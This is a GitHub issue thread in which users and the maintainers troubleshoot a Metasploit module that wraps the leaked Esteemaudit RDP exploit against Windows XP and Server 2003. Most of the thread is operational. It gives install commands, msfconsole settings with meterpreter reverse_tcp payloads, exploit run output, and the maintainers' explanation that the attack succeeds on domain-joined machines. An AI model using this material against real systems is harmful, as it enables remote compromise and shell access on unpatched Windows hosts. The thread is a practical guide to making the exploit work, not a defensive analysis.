### ISSUE TITLE
My Target is XPSP2 x86 3389 OPEN. But it still say "The machine is not vulnerable!"

### ISSUE THREAD

**Issue by anwareset** [BlackMathIT/Esteemaudit-Metasploit#2]
My Target is XPSP2 x86 3389 OPEN. But it still say "The machine is not vulnerable!"

I already do this :
- Copy the esteemaudit.rb on the right Metasploit folder
- Copy only the content of "files" folder on /usr/share/esteemaudit/
- Wine is installed properly, its work fine when I use Eternalblue-Doublepulsar

I check on "/usr/share/esteemaudit" and I found a file named "null"
this is inside the "null" file :
err:module:import_dll Library posh-0.dll (which is needed by L"Z:\\usr\\share\\esteemaudit\\Esteemaudit-2.1.0.exe") not found
err:module:import_dll Library tibe-2.dll (which is needed by L"Z:\\usr\\share\\esteemaudit\\Esteemaudit-2.1.0.exe") not found
err:module:import_dll Library trfo-2.dll (which is needed by L"Z:\\usr\\share\\esteemaudit\\Esteemaudit-2.1.0.exe") not found
err:module:import_dll Library tucl-1.dll (which is needed by L"Z:\\usr\\share\\esteemaudit\\Esteemaudit-2.1.0.exe") not found
err:module:import_dll Library trch-1.dll (which is needed by L"Z:\\usr\\share\\esteemaudit\\Esteemaudit-2.1.0.exe") not found
err:module:import_dll Library dmgd-4.dll (which is needed by L"Z:\\usr\\share\\esteemaudit\\Esteemaudit-2.1.0.exe") not found
err:module:import_dll Library coli-0.dll (which is needed by L"Z:\\usr\\share\\esteemaudit\\Esteemaudit-2.1.0.exe") not found
err:module:import_dll Library LIBEAY32.dll (which is needed by L"Z:\\usr\\share\\esteemaudit\\Esteemaudit-2.1.0.exe") not found
err:module:LdrInitializeThunk Main exe initialization for L"Z:\\usr\\share\\esteemaudit\\Esteemaudit-2.1.0.exe" failed, status c0000135

**Comment by crossmxn** [comment]
If I add those dll's from the shadows brokers dump (https://github.com/misterch0c/shadowbroker/tree/master/windows/lib/x86-Windows) I get:

MigrateProcessDLL: /usr/share/estemaudit/rudo_x86.dll is not a valid value.
ListenPayloadDLL: /usr/share/estemaudit/lipa_x86.dll is not a valid value.

**Comment by crossmxn** [comment]
(I added those on /usr/share/estemaudit/)

**Comment by BlackMathIT** [comment]
Hi crossmxn thanks for the reporting! You right we missed to add all the other DLL files, now fixed.
There was an error with the Skeleton.xml file, now fixed too. So all would be fine, please try again!

**Comment by anwareset** [comment]
is it correct metasploit directory?
/opt/metasploit-framework/modules/exploits/windows/rdp/esteemaudit.rb

I already update all the git's file and try again, but its still say :
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:3389 - Generating Esteemaudit XML data
[*] 192.168.56.101:3389 - Generating payload DLL for Esteemaudit
[*] 192.168.56.101:3389 - Writing DLL in /root/.wine/drive_c/shell.dll
[*] 192.168.56.101:3389 - Launching Esteemaudit...
[-] 192.168.56.101:3389 - The machine is not vulnerable!
[*] Exploit completed, but no session was created.

msf exploit(esteemaudit) > show options 

Module options (exploit/windows/rdp/esteemaudit):

   Name                Current Setting          Required  Description
   ----                ---------------          --------  -----------
   ESTEEMAUDITPATH     /usr/share/esteemaudit/  yes       Path directory of Esteemaudit.exe
   RHOST               192.168.56.101           yes       The target address
   RPORT               3389                     yes       The RDP service port
   TARGETARCHITECTURE  x86                      yes       Target Architecture (Accepted: x86, x64)
   WINEPATH            /root/.wine/drive_c/     yes       WINE drive_c path


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.56.1     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   XPSP2         Windows XP SP2

**Comment by BlackMathIT** [comment]
Ok so try to do 
wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe
and paste here the output

**Comment by anwareset** [comment]
msf exploit(esteemaudit) > wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe
[*] exec: wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe

InConfig: Esteemaudit-2.1.0.xml is not a valid value.

**Comment by anwareset** [comment]
Have more problem like this.
I check again on /usr/share/esteemaudit/null : 
wine: /home/penjagalilin/.wine is not owned by you

**Comment by BlackMathIT** [comment]
The right respond would be:
[*] Creating callback socket
	[+] Listening on 0.0.0.0:0
	[+] Callback socket creation complete
We have update again the ruby file and the skeleton, something in the parsing of xml file was wrong,  damned testing editor... be patience download everything again and retry please! :)

**Comment by anwareset** [comment]
: ~ # wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe
[*] Creating callback socket
	[+] Listening on 0.0.0.0:0
	[+] Callback socket creation complete
	[+] Connected to target 192.168.56.101:3389
	[+] Sending Space Bar


And stuck here..
And the metasploit is : 
msf exploit(esteemaudit) > exploit 

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] 192.168.56.101:3389 - Generating Esteemaudit XML data
[*] 192.168.56.101:3389 - Generating payload DLL for Esteemaudit
[*] 192.168.56.101:3389 - Writing DLL in /root/.wine/drive_c/shell.dll
[*] 192.168.56.101:3389 - Launching Esteemaudit...
[-] 192.168.56.101:3389 - The machine is not vulnerable!
[*] Exploit completed, but no session was created.

**Comment by BlackMathIT** [comment]
This would be the output of wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe
[*] Creating callback socket
	[+] Listening on 0.0.0.0:0
	[+] Callback socket creation complete
	[+] Connected to target 10.254.234.198:3389
	[+] Sending Space Bar
[*] Building exploit buffer.
	[+] Set Auth Code to: 0xCBA7FB18
	[+] Set XOR Mask to: 0x42DDD2FB
	[+] Successfully opened MigrateProcessDLL
	[+] Successfully opened CallbackPayloadDLL
	[+] Exploit buffer created.
	[+] Sending Enter key
	[+] SELECT_FILE - GPK Card MF
	[+] GET_RESPONSE - data unit size 
	[+] GET_RESPONSE - serial number 
	[+] SELECT_FILE - GPK Card MF
	[+] SELECT_FILE - Don't care which
	[+] GET_RESPONSE - from SELECT_FILE 
	[+] READ_BINARY - unknown offset
	[+] SELECT_FILE - Don't care which
	[+] GET_RESPONSE - from SELECT_FILE 
	[+] READ_BINARY - start of file 
	[+] Shellcode sent
	[+] SELECT_FILE - GPK Card MF
[*] First stage complete
	[+] Uploading Second Stage 0/21690 (0.00%)
	[+] Uploading Second Stage 384/21690 (1.77%)
	[+] Uploading Second Stage 768/21690 (3.54%)
	[+] Uploading Second Stage 1152/21690 (5.31%)

It seems there is some problems with the Esteemaudit-2.1.0.exe, this can't depend from msf and if the xml is compiled correctly it start, have you choice the right target? which is yours? 

So when after you have launched the exploit, copy here all the Esteemaudit-2.1.0.xml file, just to check if parameters are right

**Comment by BlackMathIT** [comment]
Ok we are reproducing your problem and investigating it, now we have same issue with a XP SP3.
For now we can confirm the exploit works right only with windows 2003 server editions (all SP included). Let's keep in touch...

**Comment by BlackMathIT** [comment]
The module is working well, the vulnerability exploited by this attack is related to Smart Card authentication used when logging onto the system via the RDP service. Windows XP differently from Windows server 2003 don't have this feature enable by design, so the exploit never receive the smartcard callback for building the exploit buffer and injecting the payload... 
FYI: http://ptgmedia.pearsoncmg.com/images/sam_fogie5_winxpwireless/elementLinks/fig03.gif

**Comment by anwareset** [comment]
I trying again with Windows 2003 SP2 x64 as my target.
set TARGET 10
set PAYLOAD windows/x64/meterpreter/reverse_tcp

**************************************************************************************************

~ # wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe
InConfig: Esteemaudit-2.1.0.xml is not a valid value.


**************************************************************************************************

msf exploit(esteemaudit) > exploit 

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:3389 - Generating Esteemaudit XML data
[*] 192.168.56.101:3389 - Generating payload DLL for Esteemaudit
[*] 192.168.56.101:3389 - Writing DLL in /root/.wine/drive_c/shell.dll
[*] 192.168.56.101:3389 - Launching Esteemaudit...
[-] 192.168.56.101:3389 - The machine is not vulnerable!
[*] Exploit completed, but no session was created.

**Comment by BlackMathIT** [comment]
@anwareset if you receive this:
InConfig: Esteemaudit-2.1.0.xml is not a valid value.
it means that the Skeleton XML file is an old version not parsed correctly so the exploit don't start.
I have tried now with latest version uploaded and it works correctly, so delete your ruby file and esteemaudit folder and start from a cleaned point.

**Comment by BlackMathIT** [comment]
@anwareset we have more info for you, have made more tests and understand that if the machine is not in a domain the exploit stuck here (as happen to you on XP):
: ~ # wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe
[*] Creating callback socket
[+] Listening on 0.0.0.0:0
[+] Callback socket creation complete
[+] Connected to target 192.168.56.101:3389
[+] Sending Space Bar

we have created same condition and if the machine is in a domain the exploit works, independently if 802.1x smart card auth is actived or not... It would be more appreciate to have some positive feedback from you too about this last case.

**Comment by 5kuby** [comment]
Same here guys on w2k3 sp1 std ed in a workgroup enviroment. I've installed Metasploit on a fresh mint installation so for an unknown reason i don't have the /usr/share/metasploit-framework dir ... i can see all other MS modules ... think they are on other dir in my FS ... so i created a new dir tree in /root/.msf4 and now i can launch the exploit but it exit with the same message" The machine is not vulnerable!" Launching wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe  i receive the "InConfig: Esteemaudit-2.1.0.xml is not a valid value." message. I've downloaded the entire pack of files about one hour ago ... Anyway i don't understand your post

> _We have created same condition and understood that if the machine is in a domain the exploit works fine. This because doesn't matter if 802.1x smart card auth is actived or not on the client, there is a GPO related that enables it by default.
> 
> The GPO is :
> Interactive logon: Require smart card
> 
> Details:
> This security setting requires users to log on to a computer using a smart card.
> The options are:
> Enabled: Users can only log on to the computer using a smart card.
> Disabled. Users can log on to the computer using any method.
> Default: Disabled._

Now as i can read it seems thath if a w2k3 machine are joined on a domain there is no other way to logon different from smartcard ... what I did not understand?

**Comment by BlackMathIT** [comment]
>Now as i can read it seems thath if a w2k3 machine are joined on a domain there is no other way to logon different from smartcard ... what I did not understand?

No, simply with the GPO "Interactive logon: Require smart card" disable (this is by default in a windows domain infrastructure), users can log on to the computer using any method, smart card included.

**Comment by anwareset** [comment]
Hello can I use x64 victim as my target?

msf exploit(esteemaudit) > set TARGETARCHITECTURE x64
TARGETARCHITECTURE => x64
----------------------------------------------------------------------------------
# wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe
Architecture: x64 is not a valid value.

**Comment by BlackMathIT** [comment]
> Hello can I use x64 victim as my target?

Yes sure, there was an issue on the ruby for the x64 target, now fixed, download the new one.
Now you can set 64bit :
set TARGETARCHITECTURE  x86 64bit

**Comment by g0rwx** [comment]
안돼잖아

**Comment by g0rwx** [comment]
앉떄쨔나

**Comment by GGGunrunner** [comment]
I'm also getting this..

wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe
InConfig: Esteemaudit-2.1.0.xml is not a valid value.

And I downloaded it just 20 minutes ago - after you suggested to redownload the fixed version. :)
Is the bug still there?

**Comment by BlackMathIT** [comment]
@GGGunrunner do you have a Esteemaudit-2.1.0.xml file inside /usr/share/esteemaudit ?

**Comment by claudioviviani** [comment]
XPSP2 x86 target FAIL.
Tested on BackBox Linux x64.

root@backbox:~# git clone https://github.com/BlackMathIT/Esteemaudit-Metasploit/
root@backbox:~# cp -prf Esteemaudit-Metasploit/files/ /usr/share/esteemaudit/
root@backbox:~# cp Esteemaudit-Metasploit/esteemaudit.rb /opt/metasploit-framework/modules/exploits/windows/
root@backbox:~# WINEARCH=win32 wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe 2>0
root@backbox:~# msfconsole
msf >
msf > use exploit/windows/esteemaudit 
msf exploit(esteemaudit) > set RHOST 10.21.12.54
RHOST => 10.21.12.54
msf exploit(esteemaudit) > set target 4
target => 4
msf exploit(esteemaudit) > show options

Module options (exploit/windows/esteemaudit):

   Name                Current Setting          Required  Description
   ----                ---------------          --------  -----------
   ESTEEMAUDITPATH     /usr/share/esteemaudit/  yes       Path directory of Esteemaudit.exe
   RHOST               10.21.12.54              yes       The target address
   RPORT               3389                     yes       The RDP service port
   TARGETARCHITECTURE  x86                      yes       Target Architecture (Accepted: x86, x86 64-bit)
   WINEPATH            /root/.wine/drive_c/     yes       WINE drive_c path


Exploit target:

   Id  Name
   --  ----
   4   XPSP3         Windows XP SP3


msf exploit(esteemaudit) > exploit

[*] Started reverse TCP handler on 10.21.12.40:4444 
[*] 10.21.12.54:3389 - Generating Esteemaudit XML data
[*] 10.21.12.54:3389 - Generating payload DLL for Esteemaudit
[*] 10.21.12.54:3389 - Writing DLL in /root/.wine/drive_c/shell.dll
[*] 10.21.12.54:3389 - Launching Esteemaudit...

**** after 5 mins ****

[-] 10.21.12.54:3389 - The machine is not vulnerable!
[*] Exploit completed, but no session was created.

P.s
Windows 2003 SP2 x86 target WORK

**Comment by BlackMathIT** [comment]
@claudioviviani your target machine is in a domain or workgroup? Workgroup the exploit doesn't work! i need the output of this:
wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe

**Comment by claudioviviani** [comment]
@BlackMathIT i'm sorry, i mistaked: My Windows xp target was not joined!

**Comment by BlackMathIT** [comment]
Perfect @claudioviviani, so you confirm the exploit works on your joined XP too ? 👍

**Comment by rperezg27** [comment]
@BlackMathIT Hi, how are you?, please can you help me.. Im trying use this exploit but I have the error:

msf exploit(esteemeaudit) > exploit 

[*] Started reverse TCP handler on 192.168.56.101:4444 
[*] 192.168.56.105:3389 - Generating Esteemaudit XML data
[*] 192.168.56.105:3389 - Generating payload DLL for Esteemaudit
[*] 192.168.56.105:3389 - Writing DLL in /root/.wine/drive_c/shell.dll
[*] 192.168.56.105:3389 - Launching Esteemaudit...
[-] 192.168.56.105:3389 - The machine is not vulnerable!
[*] Exploit completed, but no session was created.

I read all post and answers, but the error continue...

I try with Windows 2003 standard edition SP1 english edition. Outside of domain, but the machine have active the option "Smart card or ....", my configuration of exploit is:

msf exploit(esteemeaudit) > show options 

Module options (exploit/windows/rdp/esteemeaudit):

   Name                Current Setting          Required  Description
   ----                ---------------          --------  -----------
   ESTEEMAUDITPATH     /usr/share/esteemaudit/  yes       Path directory of Esteemaudit.exe
   RHOST               192.168.56.105           yes       The target address
   RPORT               3389                     yes       The RDP service port
   TARGETARCHITECTURE  x86                      yes       Target Architecture (Accepted: x86, x86 64-bit)
   WINEPATH            /root/.wine/drive_c/     yes       WINE drive_c path


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.56.101   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   7   W2K3SP1       Windows 2003 SP1

Best Regards :)

**Comment by BlackMathIT** [comment]
@rperezg27 we have tried many times with machines outside a domain and the exploit doesn't work, this is how the NSA exploit itself is built or maybe is necessary something else more than 802.1x options and we are investigating about, anyway if your target is in a domain the exploit works fine,  there is a GPO that enable all you need to trigger it.

**Comment by fquiroga** [comment]
Hi there, 
in my case the output of the exploit is: 
msf exploit(esteemaudit) > exploit

[*] Started reverse TCP handler on x.x.x.x:4444 
[*] x.x.x.x:3389 - Generating Esteemaudit XML data
[*] x.x.x.x.:3389 - Generating payload DLL for Esteemaudit
[*] x.x.x.x.227:3389 - Writing DLL in /root/.wine/drive_c/shell.dll
[*] x.x.x.x:3389 - Launching Esteemaudit...
[-] x.x.x.x:3389 - The machine is not vulnerable!
[*] Exploit completed, but no session was created.

When i run wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe 
InConfig: Esteemaudit-2.1.0.xml is not a valid value.

The file in /usr/share/esteemaudit/ exist:

**Comment by fquiroga** [comment]
ls -ha /usr/share/esteemaudit/
.                                 exma-1.dll       posh-0.dll    trch-1.dll
..                                exma.dll         posh.dll      trch.dll
adfw-2.dll                        iconv.dll        pytrch.py     trfo-0.dll
adfw.dll                          libcurl.dll      pytrch.pyc    trfo-2.dll
cnli-0.dll                        libeay32.dll     _pytrch.pyd   trfo.dll
cnli-1.dll                        libiconv-2.dll   riar-2.dll    tucl-1.dll
coli-0.dll                        libxml2.dll      riar.dll      tucl.dll
crli-0.dll                        lipa_x64.dll     rudo_x64.dll  ucl.dll
dmgd-1.dll                        lipa_x86.dll     rudo_x86.dll  xdvl-0.dll
dmgd-4.dll                        null             ssleay32.dll  zibe.dll
esco-0.dll                        pcla-0.dll       tibe-1.dll    zlib1.dll
Esteemaudit-2.1.0.0.Skeleton.xml  pcre-0.dll       tibe-2.dll
Esteemaudit-2.1.0.exe             pcrecpp-0.dll    tibe.dll
Esteemaudit-2.1.0.xml             pcreposix-0.dll  trch-0.dll

**Comment by fquiroga** [comment]
Hi there,
in my case the output of the exploit is:
msf exploit(esteemaudit) > exploit

[] Started reverse TCP handler on x.x.x.x:4444
[] x.x.x.x:3389 - Generating Esteemaudit XML data
[] x.x.x.x.:3389 - Generating payload DLL for Esteemaudit
[] x.x.x.x.227:3389 - Writing DLL in /root/.wine/drive_c/shell.dll
[] x.x.x.x:3389 - Launching Esteemaudit...
[-] x.x.x.x:3389 - The machine is not vulnerable!
[] Exploit completed, but no session was created.

When i run wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe
InConfig: Esteemaudit-2.1.0.xml is not a valid value.

The file Esteemaudit-2.1.0.xml, at least exist in the folder:

# ls -lha /usr/share/esteemaudit/ | grep Esteemaudit-2.1.0.
-rw-r--r--   1 root root  47K Jun  4 01:12 Esteemaudit-2.1.0.0.Skeleton.xml
-rw-r--r--   1 root root  68K Jun  4 01:12 Esteemaudit-2.1.0.exe
-rw-r--r--   1 root root  47K Jun  4 01:58 Esteemaudit-2.1.0.xml

This is the output of the /usr/share/esteemaudit/null : 
cat /usr/share/esteemaudit/null 
	[-] Timeout waiting for smartcard callback!

I can confirm that the machine is'nt into a windows Domain. 
So, it would advertised that the exploit will be successfull only in a Domain Joined Windows 2003 ? 
Thanks.

**Comment by BlackMathIT** [comment]
@fquiroga Yes the exploit works only on a Domain Infrastructure because it need a CA to validate the RDP smart card auth.
